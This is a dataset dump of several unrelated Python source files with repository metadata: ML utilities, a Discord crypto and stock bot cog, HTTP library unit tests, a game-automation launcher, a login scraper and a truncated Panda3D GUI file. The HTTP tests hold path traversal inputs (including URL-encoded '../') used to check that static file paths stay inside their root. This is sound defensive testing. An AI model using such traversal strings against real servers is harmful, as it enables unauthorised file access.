8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
chars (str, optional): charachters to be used to generate the string.
Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: a random chain of charachters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
params (dict): dictionnary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
metrics (dict, optional): a dictionnary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
[tree.feature_importances_ for tree in model.estimators_],
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
print (os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:]
| 33.815951
| 90
| 0.649492
| 747
| 5,512
| 4.658635
| 0.263722
| 0.032184
| 0.028161
| 0.013793
| 0.267816
| 0.193103
| 0.165517
| 0.144253
| 0.112644
| 0.112644
| 0
| 0.006775
| 0.250181
| 5,512
| 163
| 91
| 33.815951
| 0.835229
| 0.347424
| 0
| 0.142857
| 0
| 0
| 0.10565
| 0.039435
| 0
| 0
| 0
| 0
| 0.02381
| 1
| 0.083333
| false
| 0
| 0.238095
| 0
| 0.345238
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c0292ca1d781849b4c6bb27642731423800d86
| 7,504
|
py
|
Python
|
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
import asyncio
import discord
from discord.ext import commands
import re
import sqlite3
from urllib.parse import quote as uriquote
import html
CURR = ["AUD", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HUF", "IDR", "ILS", "INR", "JPY", "KRW", "MXN",
"MYR", "NOK", "NZD", "PHP", "PKR", "PLN", "RUB", "SEK", "SGD",
"THB", "TRY", "TWD", "ZAR"]
class Finance(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def coin(self, ctx, *, line: str):
"""Look up a cryptocurrency such as Bitcoin
Optionally specify a quantity such as `0.6 ETH`
Optionally specify a conversion value such as `2 BTC in ETH` or `ETH in CAD`"""
coin = await self.parse_coinline(line)
if not coin:
await ctx.send(f"Unable to find coin {line}")
return
url = f"https://api.coinmarketcap.com/v1/ticker/{coin['coin']}{coin['currency']}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data[0]
cid = data['symbol'].upper()
name = data['name']
pUSD = data['price_usd']
pC24 = data['percent_change_24h']
pC1 = data['percent_change_1h']
output = ""
if coin.get('cvtto', ''):
cvtval = await self.convert_coin(coin, data)
if not cvtval:
await ctx.send(f"Failed to look up {coin['cvtto']}")
return
if coin['qty'] == 1:
output = "{} {} | Value: {} {} (${} USD) | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, cvtval, coin['cvtto'].upper(), pUSD, pC1, pC24)
else:
usdfinal = float(pUSD) * coin['qty']
output = "{} {} : {} {} (${:.2f} USD)".format(coin['qty'], cid, cvtval, coin['cvtto'].upper(), usdfinal)
else:
if coin['qty'] == 1:
output = "{} {} | Value: ${} | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, pUSD, pC1, pC24)
else:
finalprice = float(pUSD) * coin['qty']
output = "{} {} : ${:.2f}".format(coin['qty'], cid, finalprice)
if output:
await ctx.send(output)
async def convert_coin(self, coin, data):
if coin['currency']:
cvtval = "{:.2f}".format(float(data['price_{}'.format(coin['cvtto'].lower())]) * coin['qty'])
else:
if not coin['cvtto']:
cvtval = ''
if coin['cvtto'] == "bitcoin":
#api gives us BTC by default
cvtval = self.ffstr(float(data['price_btc']) * coin['qty'])
coin['cvtto'] = "BTC"
else:
pUSD = data['price_usd']
url = "https://api.coinmarketcap.com/v1/ticker/{}".format(coin['cvtto'])
async with self.bot.session.get(url) as resp:
tojson = await resp.json()
coin['cvtto'] = tojson[0]['symbol'].upper()
toval = float(tojson[0]['price_usd'])
cvtval = self.ffstr((float(pUSD) * coin['qty']) / toval)
return cvtval
def ffstr(self, number):
return "{:.8f}".format(float(number)).rstrip('0').rstrip('.')
async def parse_coinline(self, line):
coinqty = 1
qtycheck = re.search(r"(^(\d*\.)?\d+)\s?(\w.+)", line)
if qtycheck:
coinqty = float(qtycheck.group(1))
line = qtycheck.group(3).strip()
curr = ""
cvtto = ""
if " in " in line or " to " in line:
if " in " in line:
coin, cvtto = line.split(" in ")
elif " to " in line:
coin, cvtto = line.split(" to ")
coinid = await self.findcoin(coin)
if cvtto.upper() in CURR:
curr = "?convert={}".format(cvtto)
else:
cvtto = await self.findcoin(cvtto)
else:
coin = line
coinid = await self.findcoin(coin)
if not coinid:
return None
return {'coin': coinid,
'qty': coinqty,
'currency': curr,
'cvtto': cvtto}
async def findcoin(self, coin):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT coinid FROM coins WHERE coinid = (?) OR symbol = (?)", (coin, coin)).fetchone()
if not result:
like = "%{}%".format(coin)
result = cursor.execute("SELECT coinid FROM coins WHERE name LIKE (?)", [like]).fetchone()
if result:
return result[0]
@commands.command(hidden=True)
@commands.is_owner()
async def newcoins(self, ctx):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='coins';").fetchone()
if not result:
cursor.execute("CREATE TABLE 'coins' ('symbol' TEXT, 'coinid' TEXT UNIQUE ON CONFLICT REPLACE, 'name' TEXT);")
conn.commit()
url = "https://api.coinmarketcap.com/v1/ticker/?limit=0"
async with self.bot.session.get(url) as resp:
data = await resp.json()
for coin in data:
sym = coin['symbol'].lower()
cid = coin['id'].lower()
name = coin['name'].lower()
cursor.execute("insert into coins values (?, ?, ?)", (sym,cid,name))
conn.commit()
conn.close()
@commands.command(aliases=['stonks', 'stocks'])
async def stock (self, ctx, name: str):
"""Look up a stock and show its current price, change, etc"""
symbol = ""
url = f"https://autoc.finance.yahoo.com/autoc?query={uriquote(name)}®ion=1&lang=en&guccounter=1"
async with self.bot.session.get(url) as resp:
data = await resp.json()
symbol = data['ResultSet']['Result'][0]['symbol']
if not symbol:
await ctx.send(f"Unable to find a stonk named `{name}`")
return
url = f"http://query1.finance.yahoo.com/v7/finance/quote?symbols={symbol}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data["quoteResponse"]["result"][0]
downup = "\N{CHART WITH UPWARDS TREND}" if data['regularMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr = "{}{}: {} {} :: Today's change: {:.2f} ({:.2f}%) {}"
longn = ' ({})'.format(data['shortName']) if 'shortName' in data else ''
outstr = outstr.format(data['symbol'], longn, data['regularMarketPrice'], data['currency'],
float(data['regularMarketChange']), float(data['regularMarketChangePercent']),
downup)
if 'postMarketPrice' in data and (data['marketState'] == "CLOSED" or "POST" in data['marketState']):
pdu = "\N{CHART WITH UPWARDS TREND}" if data['postMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr += " :: After Hours: {:.2f} - Change: {:.2f} {}".format(data['postMarketPrice'],
data['postMarketChange'], pdu)
await ctx.send(html.unescape(outstr))
def setup(bot):
bot.add_cog(Finance(bot))
| 40.344086
| 166
| 0.518124
| 853
| 7,504
| 4.534584
| 0.277843
| 0.025595
| 0.015512
| 0.020683
| 0.261634
| 0.261634
| 0.202689
| 0.157187
| 0.122285
| 0.094623
| 0
| 0.010974
| 0.319963
| 7,504
| 185
| 167
| 40.562162
| 0.747012
| 0.003598
| 0
| 0.22
| 0
| 0.02
| 0.245019
| 0.006779
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.046667
| 0.006667
| 0.126667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c1a9c69d580b85cf1676ca01e443acef7eb239
| 9,048
|
py
|
Python
|
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | 2
|
2015-08-25T11:31:42.000Z
|
2015-10-16T11:30:15.000Z
|
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | null | null | null |
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | null | null | null |
import unittest
import unittest.mock as mock
import asyncio
import pyx.http as http
def create_dummy_message():
msg = http.HttpMessage(None)
msg.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Cookie', 'a'),
http.HttpHeader('Cookie', 'b'),
]
return msg
def create_dummy_connection():
loop = asyncio.get_event_loop()
reader = asyncio.StreamReader(loop=loop)
@asyncio.coroutine
def dummy_drain():
yield from asyncio.sleep(0.001)
writer = mock.Mock(spec=asyncio.StreamWriter)
writer.attach_mock(mock.Mock(wraps=dummy_drain), 'drain')
conn = http.HttpConnection(reader, writer)
return conn
def create_dummy_request():
conn = create_dummy_connection()
req = http.HttpRequest(conn)
return req
class TestHttpMessage(unittest.TestCase):
def test_get_header(self):
msg = create_dummy_message()
self.assertEqual(msg.get_header("server"), ["Pyx"])
self.assertEqual(msg.get_header("SERVER"), ["Pyx"])
self.assertEqual(msg.get_header("pragma"), [])
self.assertEqual(msg.get_header("cookie"), ["a", "b"])
self.assertEqual(msg.get_first_header("cookie"), "a")
self.assertTrue(msg.get_first_header("pragma") is None)
def test_write_headers(self):
msg = create_dummy_message()
self.assertEqual(msg.write_headers(),
['Server: Pyx', 'Cookie: a', 'Cookie: b'])
msg.headers = []
self.assertEqual(msg.write_headers(), [])
class TestHttpRequest(unittest.TestCase):
def test_parse_req_line(self):
req = create_dummy_request()
req._parse_req_line(b'POST / HTTP/1.1\r\n')
self.assertEqual(req.method, 'POST')
self.assertEqual(req.path, '/')
self.assertTrue(req.query is None)
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
req._parse_req_line(
b'GET /some/path?some=query&some_other=query HTTP/1.1\r\n')
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/some/path')
self.assertEqual(req.query, 'some=query&some_other=query')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET /\r\n')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET / GARBAGE\r\n')
req._parse_req_line(b'GET / HTTP/1\r\n')
self.assertEqual(req.version, (1, 0))
def test_parse_header(self):
req = create_dummy_request()
req._parse_header(b'Server: Pyx\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', 'Pyx')])
req.headers = []
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b'Server\r\n')
req.headers = []
req._parse_header(b'Server:\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Server: \r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Host: some.badasshost.com:8080\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Host', 'some.badasshost.com:8080')])
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b': pyx\r\n')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' : pyx')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' \t : pyx')
def test_parse(self):
loop = asyncio.get_event_loop()
conn = create_dummy_connection()
reader = conn.reader
reader.feed_data(
b'GET /?q=p&s=t HTTP/1.1\r\n'
b'Host: localhost\r\n'
b'Connection: Keep-Alive\r\n'
b'Pragma: Test\r\n'
b' : Test\r\n'
b'\r\n')
req = loop.run_until_complete(http.HttpRequest.parse(conn))
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/')
self.assertEqual(req.query, 'q=p&s=t')
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
self.assertEqual(req.headers,
[
http.HttpHeader('Host', 'localhost'),
http.HttpHeader('Connection', 'Keep-Alive'),
http.HttpHeader('Pragma', 'Test'),
])
def test_respond(self):
req = create_dummy_request()
req.version = (1, 1)
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertEqual(resp.version, (1, 1))
req.version = (1, 0)
resp = req.respond(400)
self.assertEqual(resp.code, 400)
self.assertEqual(resp.version, (1, 0))
class TestHttpResponse(unittest.TestCase):
def test_write(self):
resp = http.HttpResponse(200, None)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Connection', 'keep-alive')
]
self.assertEqual(resp.write(),
['HTTP/1.1 200 OK',
'Server: Pyx',
'Connection: keep-alive',
'\r\n'])
self.assertEqual(str(resp),
'HTTP/1.1 200 OK\r\n'
'Server: Pyx\r\n'
'Connection: keep-alive\r\n'
'\r\n')
def test_send(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertFalse(req.responded)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Content-Length', '100'),
http.HttpHeader('Content-Type', 'text/plain'),
]
loop.run_until_complete(resp.send())
resp.connection.writer.write.assert_called_with(str(resp).encode())
self.assertTrue(req.responded)
def test_send_body(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
loop.run_until_complete(resp.send())
self.assertTrue(req.responded)
loop.run_until_complete(resp.send_body(b'Yes, this is the body.'))
resp.connection.writer.write.assert_called_with(b'Yes, this is the body.')
loop.run_until_complete(resp.send_body('This is another string body.'))
resp.connection.writer.write.assert_called_with(b'This is another string body.')
class DummyResource(http.UrlResource):
def get_child(self, key):
if key == 'hello':
return self
elif key == "static":
return http.StaticRootResource('.')
else:
raise http.HttpError(404, '{} not found'.format(key))
class TestUrlResource(unittest.TestCase):
def test_traverse(self):
res = DummyResource()
self.assertEqual(res.traverse(''), res)
self.assertEqual(res.traverse('/'), res)
self.assertEqual(res.traverse('/hello'), res)
with self.assertRaises(http.HttpError):
res.traverse('/does/not/exist')
sres = res.traverse('/static')
self.assertEqual(sres.root, '.')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/some/path')
self.assertEqual(sres._build_real_path(), './some/path')
def test_not_implemented(self):
res = http.UrlResource()
with self.assertRaises(NotImplementedError):
res.traverse('/hello')
req = create_dummy_request()
with self.assertRaises(NotImplementedError):
res.handle_request(req)
class TestStaticRootResource(unittest.TestCase):
def test_build_real_path(self):
res = http.StaticRootResource('local_root')
res = res.traverse('/some/long/path/where/ever/it/leads/')
self.assertEqual(res._build_real_path(),
'local_root/some/long/path/where/ever/it/leads')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/%2e%2e%2f%2e%2e/dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
| 33.511111
| 92
| 0.59527
| 1,049
| 9,048
| 4.987607
| 0.148713
| 0.12328
| 0.061927
| 0.025994
| 0.639526
| 0.522362
| 0.477446
| 0.408257
| 0.36143
| 0.260703
| 0
| 0.011743
| 0.265915
| 9,048
| 269
| 93
| 33.635688
| 0.775971
| 0
| 0
| 0.318841
| 0
| 0.004831
| 0.138594
| 0.039567
| 0
| 0
| 0
| 0
| 0.294686
| 1
| 0.082126
| false
| 0
| 0.019324
| 0
| 0.154589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c480f55405e4b344842fed3a1082b875de03dd
| 1,349
|
py
|
Python
|
main.py
|
DuskXi/ArkX
|
7b416ae0c4ec2b383c6f414ed475930dd228909f
|
[
"Apache-2.0"
] | 2
|
2022-02-18T03:08:38.000Z
|
2022-03-03T04:20:08.000Z
|
main.py
|
DuskXi/ArkX
|
7b416ae0c4ec2b383c6f414ed475930dd228909f
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
DuskXi/ArkX
|
7b416ae0c4ec2b383c6f414ed475930dd228909f
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
from File.file import File
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def fileRead(fileName, encoding='utf-8'):
with open(fileName, encoding=encoding) as f:
return f.read()
def main():
from Automation.distributor import Distributor
from Performance import recoder
from WebInterface import web
modelConfig = json.loads(fileRead("config/model.json"))
labelsName = json.loads(fileRead("config/labelsName.json"))
config = json.loads(fileRead("config/config.json"))
# file = File()
classifyModel = modelConfig["imageClassificationModel"]
# if not file.mergedFile(classifyModel["filePath"], classifyModel["fileName"], classifyModel["files"]):
# print("文件合并失败")
# print("回车退出")
# input()
# exit(0)
recoder.Recoder.debug = False
recoder.Recoder.debugSleepingTime = 60 * 60
recoder.Recoder.initDataSet([modelConfig["objectDetectionModel"]["modelName"], modelConfig["addSanityModel"]["modelName"]],
[classifyModel["modelName"]])
# modelConfig["imageClassificationModel"]["filePath"] = os.path.join(classifyModel["filePath"], classifyModel["fileName"])
distributor = Distributor(modelConfig, config["adb_path"], labelsName)
web.run(distributor, config)
if __name__ == "__main__":
main()
| 30.659091
| 127
| 0.681987
| 136
| 1,349
| 6.669118
| 0.455882
| 0.029768
| 0.056229
| 0.076075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006346
| 0.182357
| 1,349
| 43
| 128
| 31.372093
| 0.815956
| 0.220904
| 0
| 0
| 0
| 0
| 0.176414
| 0.044104
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.26087
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c68966a759ee86d163e95dee1679657c063de3
| 2,236
|
py
|
Python
|
Python Spider/xpath/03 login.py
|
CodingGorit/Coding-with-Python
|
b0f1d5d704b816a85b0ae57b46d00314de2a67b9
|
[
"Apache-2.0"
] | 1
|
2020-01-31T15:57:29.000Z
|
2020-01-31T15:57:29.000Z
|
Python Spider/xpath/03 login.py
|
CodingGorit/Coding-with-Python
|
b0f1d5d704b816a85b0ae57b46d00314de2a67b9
|
[
"Apache-2.0"
] | null | null | null |
Python Spider/xpath/03 login.py
|
CodingGorit/Coding-with-Python
|
b0f1d5d704b816a85b0ae57b46d00314de2a67b9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#file: 03 login.py
#@author: Gorit
#@contact: gorit@qq.com
#@time: 2020/1/20 12:44
import requests
from lxml import etree
# 封装类,进行学习猿地的登录和订单的获取
class lMonKey():
# 登录请求地址
loginUrl = "https://www.lmonkey.com/login"
# 账户中心地址
orderUrl = "https://www.lmonkey.com/my/order"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3741.400 QQBrowser/10.5.3863.400"
}
# 请求对象
req = None
# token 口令
token = ''
# 订单号
# 初始化的方法
def __init__(self):
# 请求对象的初始化
self.req = requests.session()
if self.getlogin(): # get 登录成功
if self.postlogin(): # post 登录成功
self.getordder()
# get 登录页面,获取 _token
def getlogin(self):
# 1. get 请求 login页面,设置 cookie,获取_token
res = self.req.get(url=self.loginUrl,headers=self.headers)
if res.status_code == 200:
print("get 页面请求成功")
html = etree.HTML(res.text)
self.token = html.xpath("//input[@name='_token']/@value")[0]
#找到 input 标签下的,属性为 name="_token" 的标签,找它的 vcalue 的值,也就是 token 的值
# input[@name='xxx'] 找到指定标签
print("token 获取成功")
return True
else:
print("请求错误")
# post 登录,设置 cookie
def postlogin(self):
uname = input("输入你的手机号:")
passw = input("请输入你的密码:")
data = {
"_token": self.token,
"username": uname,
"password": passw
}
# 发起 post 请求
res = self.req.post(url=self.loginUrl,headers=self.headers,data=data)
if res.status_code==200 or res.status_code==302:
print("登录成功!!")
return True
def getordder(self):
# 获取订单页,使用 get 请求即可,获取默认订单号
# 解析数据即可
res = self.req.get(url=self.orderUrl,headers=self.headers)
if res.status_code == 200:
print("请求订单页页面成功")
html = etree.HTML(res.text)
# 頁面解析
r = html.xpath("//div[@class='avatar-content']/small/text()")
print(r)
else:
print("頁面請求失敗")
obj = lMonKey()
| 27.268293
| 175
| 0.549195
| 280
| 2,236
| 4.339286
| 0.507143
| 0.023045
| 0.042798
| 0.037037
| 0.181893
| 0.134156
| 0.06749
| 0.06749
| 0.06749
| 0
| 0
| 0.048021
| 0.310823
| 2,236
| 81
| 176
| 27.604938
| 0.740428
| 0.18381
| 0
| 0.170213
| 0
| 0.021277
| 0.210556
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0.042553
| 0.042553
| 0
| 0.297872
| 0.148936
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c72a3c1f9827cd7d71f3da809f2313db6f0a32
| 9,730
|
py
|
Python
|
src/gui/MultiplayerPlayerInfo.py
|
fireclawthefox/AnkandoraLight
|
05b71e1a2919141cce02cb1aade95fbac682614b
|
[
"BSD-2-Clause"
] | 3
|
2020-07-31T10:27:06.000Z
|
2022-01-11T20:28:55.000Z
|
src/gui/MultiplayerPlayerInfo.py
|
fireclawthefox/AnkandoraLight
|
05b71e1a2919141cce02cb1aade95fbac682614b
|
[
"BSD-2-Clause"
] | null | null | null |
src/gui/MultiplayerPlayerInfo.py
|
fireclawthefox/AnkandoraLight
|
05b71e1a2919141cce02cb1aade95fbac682614b
|
[
"BSD-2-Clause"
] | 1
|
2020-07-30T08:23:28.000Z
|
2020-07-30T08:23:28.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file was created using the DirectGUI Designer
from direct.gui import DirectGuiGlobals as DGG
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectLabel import DirectLabel
from direct.gui.DirectButton import DirectButton
from direct.gui.DirectOptionMenu import DirectOptionMenu
from panda3d.core import (
LPoint3f,
LVecBase3f,
LVecBase4f,
TextNode
)
class GUI:
def __init__(self, rootParent=None):
self.frmMain = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-1.777778, 1.77777778, -1.1638, 1.1638),
hpr=LVecBase3f(0, 0, 0),
image='assets/menu/Background.png',
pos=LPoint3f(0, 0, 0),
image_scale=LVecBase3f(1.77778, 1, 1.1638),
image_pos=LPoint3f(0, 0, 0),
parent=rootParent,
)
self.frmMain.setTransparency(0)
self.frmSinglePlayerCreateGame = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.65, 0.65, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.425, 0, 0),
relief=5,
parent=self.frmMain,
)
self.frmSinglePlayerCreateGame.setTransparency(0)
self.pg703 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.425),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg703.setTransparency(0)
self.pg13803 = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.35, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Start',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_start"],
)
self.pg13803.setTransparency(0)
self.pg5219 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.6, 0, 0.02),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Class',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg5219.setTransparency(0)
self.optionPlayerClass = DirectOptionMenu(
items=['item1'],
frameSize=(0.07500000298023224, 3.012500149011612, -0.11250001192092896, 0.75),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.2, 0, 0.005),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='item1',
cancelframe_frameSize=(-1, 1, -1, 1),
